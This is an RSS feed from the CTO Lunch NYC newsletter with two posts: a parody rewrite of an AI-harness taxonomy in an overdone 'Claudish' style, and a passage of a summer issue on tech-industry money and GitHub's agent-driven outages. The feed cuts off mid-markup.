<script data-pm-proxy="intercept"></script><?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[CTO Lunch NYC]]></title><description><![CDATA[What engineering leadership sounds like off the record. (Now on record.)]]></description><link>https://ctolunchnyc.substack.com</link><image><url>https://substackcdn.com/image/fetch/$s_!0Ys_!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fctolunchnyc.substack.com%2Fimg%2Fsubstack.png</url><title>CTO Lunch NYC</title><link>https://ctolunchnyc.substack.com</link></image><generator>Substack</generator><lastBuildDate>Tue, 01 Sep 2026 21:35:22 GMT</lastBuildDate><atom:link href="/__u/ctolunchnyc.substack.com/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[CTO Lunch NYC]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[lostjournals@substack.com]]></webMaster><itunes:owner><itunes:email><![CDATA[lostjournals@substack.com]]></itunes:email><itunes:name><![CDATA[CTO Lunch NYC]]></itunes:name></itunes:owner><itunes:author><![CDATA[CTO Lunch NYC]]></itunes:author><googleplay:owner><![CDATA[lostjournals@substack.com]]></googleplay:owner><googleplay:email><![CDATA[lostjournals@substack.com]]></googleplay:email><googleplay:author><![CDATA[CTO Lunch NYC]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[The Claudish Guide to AI Harnesses]]></title><description><![CDATA[Genuinely, the Honest Verdict on Seven Load-Bearing Categories, Full Stop]]></description><link>https://ctolunchnyc.substack.com/p/the-claudish-guide-to-ai-harnesses</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/the-claudish-guide-to-ai-harnesses</guid><dc:creator><![CDATA[CTO Lunch NYC]]></dc:creator><pubDate>Thu, 27 Aug 2026 21:42:31 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!Rh5H!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h5><span data-color="#c96a46" style="color: rgb(201, 106, 70);">NB. This is a translation of CTO Luncher Zak Hap&#8217;s </span><strong><a href="/__u/zakhap.substack.com/p/an-ai-harness-taxonomy"><span data-color="#c96a46" style="color: rgb(201, 106, 70);">AI Harness Taxonomy</span></a></strong><span data-color="#c96a46" style="color: rgb(201, 106, 70);"> into perfect Claudish, for those who may be having difficulty understanding anything not written in this idiom. (Claudish browser plugin coming soon!)  </span></h5><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!Rh5H!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!Rh5H!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!Rh5H!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!Rh5H!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!Rh5H!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!Rh5H!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg" width="1376" height="768" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:768,&quot;width&quot;:1376,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:486451,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/213059307?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!Rh5H!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!Rh5H!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!Rh5H!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!Rh5H!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2edc9bf1-cd45-4bf2-b0e9-ebf63c652407_1376x768.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h1>The (Claudish) Harness Decision Space </h1><p>Genuinely, the honest verdict here is that I spent a month toggling between Codex and Claude Code and came out the other side with less certainty than I went in with, not more. Worth stating plainly: I thought I understood harnesses. I didn&#8217;t. I had a metaphor - engine and car - and a metaphor is not an understanding, it&#8217;s a placeholder for one. That&#8217;s the whole game, full stop.</p><p>I&#8217;m not going to pretend the bespoke stuff - thinking-models, interaction-models, integration-models - gets covered here. It doesn&#8217;t. That&#8217;s a separate piece, and dragging it in now would be scope creep dressed up as thoroughness. Here&#8217;s where I landed: stay narrow, stay load-bearing, sit with the harness question on its own terms.</p><h2>The Harness Decision Space</h2><p>Three domains. Not four, not a taxonomy with wiggle room - three, and each one is a place where an early decision calcifies into something you can&#8217;t walk back.</p><p><strong>Structural.</strong> This is the load-bearing one. What&#8217;s kernel, what&#8217;s periphery, what&#8217;s privileged and immutable versus what&#8217;s swappable - these get decided in the first weeks and then they don&#8217;t move again. It&#8217;s not just architecture - it&#8217;s the wiring that determines what you&#8217;re even allowed to delete later. The trap is that if the kernel/periphery line drifts stale, or gets drawn wrong, it doesn&#8217;t fail loud. It fails silently, months out, as a ceiling nobody remembers agreeing to.</p><p><strong>Interface.</strong> What actually sits between the token stream and the machine. Tool scope, context management, sub-agent delegation and isolation - this is the layer that decides what the model can perceive at all. I keep coming back to the shape of the failure mode here: the interface looks fine, tool calls resolve cleanly, everything lands decisively - until one stray context-window blocker surfaces, and the whole session is dead on arrival. Worth stating plainly: the interface isn&#8217;t a technical detail bolted onto the model. It&#8217;s the model&#8217;s epistemology. Get the gating wrong here and nothing downstream is trustworthy.</p><p><strong>Governance.</strong> Authority and intent. Permissions, and whether safety is a sentence in a system prompt or a compiled, interlocking system that actually holds under pressure. What is the harness optimized around - what&#8217;s it -maxxed on? Genuinely, this is where a harness stops being neutral infrastructure and starts being a company&#8217;s worldview, shipped as a product decision.</p><p>Here&#8217;s the thing worth flagging plainly: <a href="/__u/forestmars.substack.com/i/192455684/monday">Claude Code was the first harness</a> to hit real escape velocity with engineers. A core loop, a tool set, a stream of extensions that get called &#8220;standards&#8221; the week they ship, built in tight closed-door coupling with a Frontier Lab&#8217;s next model. Almost everything that exists now was built in response to it - some of it before it even had a name for what it was building toward. Each of the three domains above is just an axis where competing harnesses try to differentiate against that baseline.</p><h2>Categories of Harnesses</h2><p>Seven groupings. Not because seven is elegant - because that&#8217;s where the field actually congealed once you dedup the noise.</p><h3>Products</h3><p><strong>Monolithic + Highly Opinionated</strong> <em>(Claude Code, Codex, Amp)</em> It&#8217;s not just opinionated - it&#8217;s opinionated and welded shut. Privileged core loop, deterministic permissions and compaction and sub-agents handled for you, extensible on top but never inside. That&#8217;s the trade, full stop: you get a canonical handoff between model and tool-call in exchange for zero ability to touch the kernel. Here&#8217;s where I landed: fine, if you trust the vendor&#8217;s judgment more than your own. Not fine the moment you don&#8217;t.</p><p><strong>Plugins All the Way Down</strong> <em>(DeepSeek Harness)</em> No privileged core. The core itself is plugins, and the plugins are interchangeable, and every dependency is declared explicitly and patchable at the config layer. Worth stating plainly: this is a kit, not a car - credit to Sachin for the phrase, &#8220;kit ideology,&#8221; because that&#8217;s exactly what it is. The trap is that the developer&#8217;s attention shifts upward, off the actual code the agent produces and onto the composition layer instead. Best practices here are genuinely unwritten. Sit with that before you commit a team to it.</p><p><strong>Radically Minimalist</strong> <em>(pi, smolagents)</em> Read, write, edit, bash. That&#8217;s it. Tiny system prompt, no sub-agent complexity, no compaction eating your budget in the background. It&#8217;s not just simple - it&#8217;s legible in a way nothing else on this list is, because there&#8217;s nowhere for complexity to hide. The cost is exactly what you&#8217;d predict: everything becomes your job, and the ecosystem around it is still thin.</p><p><strong>Cloud AI Factories</strong> <em>(Devin, OpenHands, Amp Orbs)</em> Disposable sandboxes, ticket-in, diff-out. Maximizes throughput and isolation and nothing else. Genuinely, the honest verdict is that this is illegible by design - you see the output, never the trace that produced it. Fine when you only care about the result shipping clean. Dead on arrival as a debugging story.</p><p><strong>Embedded / &#8220;Agent-Surface&#8221; in Products</strong> <em>(Claude in Excel, Shopify Sidekick, MCP-server-as-product)</em> The agent isn&#8217;t the means here - it&#8217;s the end, full stop. Model and human converge on the same capability surface at the endpoint. That&#8217;s not a small thing - it&#8217;s the precondition for SaaS-as-its-own-harness actually working. The trade-off is scope: usage stays boxed to whatever the product decided to expose.</p><h3>Pieces</h3><p><strong>Research + Benchmark Harnesses</strong> <em>(SWE-agent)</em> Instrument, not tool. Built to measure, not to ship. Worth stating plainly: the moment you start treating benchmark score as the product, you&#8217;ve already lost the thread - that&#8217;s a contamination risk, not a capability signal.</p><p><strong>SDKs + Libraries</strong> <em>(Claude Agent SDK, smolagents, Pi, OpenAI Agents SDK)</em> Composable primitives, full stop. You build the loop yourself - context management, tool schema, sessions, all of it DIY. That&#8217;s not a con exactly. It&#8217;s just the honest price of the freedom.</p><h3>Speculative Harnesses</h3><p>Neither of these has a real instance yet. Here&#8217;s where I landed on including them anyway: the limit cases tell you where the pressure is actually pointing, even before anything ships.</p><p><strong>Self-Maintaining Harness + Business, Tightly Coupled</strong> A harness that rewrites itself directly against the business-logic codebase it&#8217;s serving. Software becomes specs and invariants and a running log of evals and verification, canonical end to end. The trap: none of this generalizes past the company that builds it. It&#8217;s antimemetic by construction - not secretive, just structurally unshareable.</p><p><strong>The &#8220;Zazen&#8221; Harness (Harness-No-Harness)</strong> The bitter-pill endgame. No standing harness at all - the model instantiates one at will, per task, then lets it go. It&#8217;s not minimalism - it&#8217;s the absence of the category entirely. The cost, if you sit with it long enough, is that the frontier lab stops being a vendor and becomes the whole business logic underneath every piece of software it touches.</p><h2>Closing Thoughts</h2><p>Genuinely, the honest verdict is that almost every harness on this list is -maxxed on velocity and nothing else, no matter how different their structural bets look on paper. That tracks: frontier labs sell tokens, not outcomes, so velocity is the metric that&#8217;s actually load-bearing for the business, whatever the marketing says about quality. Worth stating plainly: most token volume now comes from agentic loops, not humans typing prompts. Let it rip, let it loop - that&#8217;s not a joke, that&#8217;s the actual operating model.</p><p>Which leaves the log-maxxed, assurance-maxxed, and context-maxxed spaces completely unexplored. That&#8217;s not a gap in the research - it&#8217;s a gap in the incentive, and those don&#8217;t close on their own.</p><p>Here&#8217;s where I landed, for real this time: every category above reduces to what it lets you delete. Not what it lets you add - what it lets you delete. That&#8217;s the Bitter Lesson one layer up the stack, applied to harnesses instead of architectures. Dedup the categories, keep the handoff canonical, and sit with that.</p><p></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">The honest verdict here is that a newsletter isn't just an update &#8212; it's the load-bearing channel between this stack and you, full stop. Worth stating plainly: free, no gate, no blocker. Here's where I landed &#8212; subscribe, keep the handoff canonical, and sit with that.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p></p>]]></content:encoded></item><item><title><![CDATA[CTO Lunch NYC 🌞 Summer Edition]]></title><description><![CDATA[Didn't we used to take Summers off?]]></description><link>https://ctolunchnyc.substack.com/p/cto-lunch-nyc-summer-2026</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/cto-lunch-nyc-summer-2026</guid><dc:creator><![CDATA[CTO Lunch NYC]]></dc:creator><pubDate>Sun, 23 Aug 2026 15:11:39 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!z7iW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p></p><p style="text-align: justify;"><strong>The cracked open laptop has officially become a meme.</strong> Amazon, which started off selling books, is destroying rare texts to train AI. The top frontier labs have now entered an arms race who can felony-brag their agents escaped containment the most. <em>What a time to be alive.</em></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!z7iW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!z7iW!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!z7iW!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!z7iW!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!z7iW!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!z7iW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg" width="1126" height="768" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:768,&quot;width&quot;:1126,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:383735,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/211611094?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!z7iW!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!z7iW!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!z7iW!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!z7iW!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eb641a1-6f85-4aa3-b886-26340eb91502_1126x768.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>New York City has officially surpassed San Francisco as the largest hub of tech talent in the country,<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a>  a structural shift that highlights how broadly software engineering has spread across overall corporate surface area. While the real financial gravity of the industry is seen in the cost of the foundation model layer&#8230; Anthropic posted $11.5 billion in Q2 revenue, more than doubling Q1 and topping its own $10.9 billion projection. OpenAI made $6.7B during the same period. <span data-color="#bf9000" style="color: rgb(191, 144, 0);">Doot Doot (6 7)</span><a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a>   By coincidence, that ~$11B that Anthropic made last quarter was the total valuation of Airtable at its 2021 peak, before their 80-plus percent haircut when Bending Spoons bought them earlier this month (for $1.28B) and they became a remarkably unsung casualty of generative AI. </p><p>Which means one Cursor is worth 47 Airtables.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-3" href="#footnote-3" target="_self">3</a>  (Or 8&#189; OpenRouters.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-4" href="#footnote-4" target="_self">4</a>) But xAI didn&#8217;t pay $60B (the sale was finalized on Friday)<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-5" href="#footnote-5" target="_self">5</a> to buy them for a code editor. Or if they did, they got, for free, a running log of everything several million developers actually do all day, every day; every session, every false start, every prompt that missed, every correction to fix it, every abandoned branch, the one that didn&#8217;t work and what happened to make them work. Choice data (literally.) As industry cost economics are driven down by relentless commoditization, that dev log is the one asset in this whole thing<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-6" href="#footnote-6" target="_self">6</a> that doesn&#8217;t get cheaper on Alibaba&#8217;s release schedule. But the question isn&#8217;t really <em>why</em> did xAI buy an IDE, it&#8217;s <em>how</em> did Cursor win? Because they very obviously did. The only serious contender left was Windsurf, which Cognition fully retired earlier this summer, folding it into Devin Desktop. A fitting fate for a structured liquidity squeeze? </p><p>So Devin&#8217;s down in the most pit with Zed and everyone else but it&#8217;s unclear if any IDE can hold its own against VS Code in the long term, because VSC&#8217;s growth trajectory is naturally compounding, while the Johnnie Latelys&#8217; need an irreducible advantage and irreducibility is hard. Some things compound and some things merely accumulate. This summer we saw even more of what it looks like when an entire industry keeps funding the former and keeps treating the latter as overhead, in the leaks and the outages and the astonishingly high bills for what was supposed to be (checks notes) reliable automation, wasn&#8217;t it? </p><h2>Getting the Unicorn</h2><p>Another GitHub outage. But why? Last Monday&#8217;s incident was annoying even by recent standards: Web/API traffic hit roughly 20% errors, raw and archive downloads approached 50%, and the blast radius spread across Pull Requests, Issues, Webhooks, Actions, Copilot and authentication. GitHub has now reported nine incidents in May, six in June and eight in July, making it look less like a run of bad luck than a system under sustained pressure. The obvious suspect is AI. GitHub processed roughly a billion commits in 2025; it is now running at roughly 275 million commits a week, a 14&#215; increase in the rate of code production. 20% of all GitHub accounts were  created in the preceding six months. And since coding agents do not sleep, get bored, or catch the latest Netflix, or even decide that 3,000 pull requests is probably enough for one afternoon, they clone, push, invoke Actions, poll APIs, open PRs, retry, and do it over and over and over again.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-7" href="#footnote-7" target="_self">7</a>  The workload is not merely larger; it is qualitatively different. <a href="https://damrnelson.github.io/github-historical-uptime/">GitHub&#8217;s historical uptime graph</a><a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-8" href="#footnote-8" target="_self">8</a>  makes the deterioration look dramatic, although the underlying Status page data deserves a healthy dose of skepticism; they currently claim GitHub had 100% uptime in 1996, which is a remarkable achievement for a company that did not yet exist. (Linus Torvalds only invented Git in 2005.) </p><p>But AI is only half the story. At exactly the moment GitHub&#8217;s workload is exploding, Microsoft is rebuilding the infrastructure underneath it, moving the core service from legacy GitHub-operated data centers onto Azure. Not your everyday AWS-to-Azure migration: GitHub historically ran its own physical infrastructure, including bare-metal databases, storage, networking and application servers. The migration was  announced in October 2025, and four months later GitHub had already increased its capacity target from 10&#215; to 30&#215; because the AI-driven workload was growing faster than expected. The particularly salacious detail is that Microsoft has reportedly had to use AWS capacity to help absorb the demand while it is moving GitHub to Azure. So the story isn&#8217;t really &#8220;Azure is unreliable.&#8221; It&#8217;s that GitHub is trying to replace the engine of a moving airplane while somebody has simultaneously pulled the flaps all the way back. The architecture is in transition, the workload has changed from human-paced to machine-paced, and the old capacity models are becoming useless almost as quickly as they can be replaced. GitHub isn&#8217;t simply suffering from too many outages; it is discovering what happens when the world&#8217;s software-production infrastructure suddenly has to support software that produces software that makes software. That&#8217;s the unicorn Microsoft is tryna catch, and right now, it&#8217;s running faster than their infrastructure can keep up.</p><div class="pullquote"><p>IN THIS ISSUE<br><a 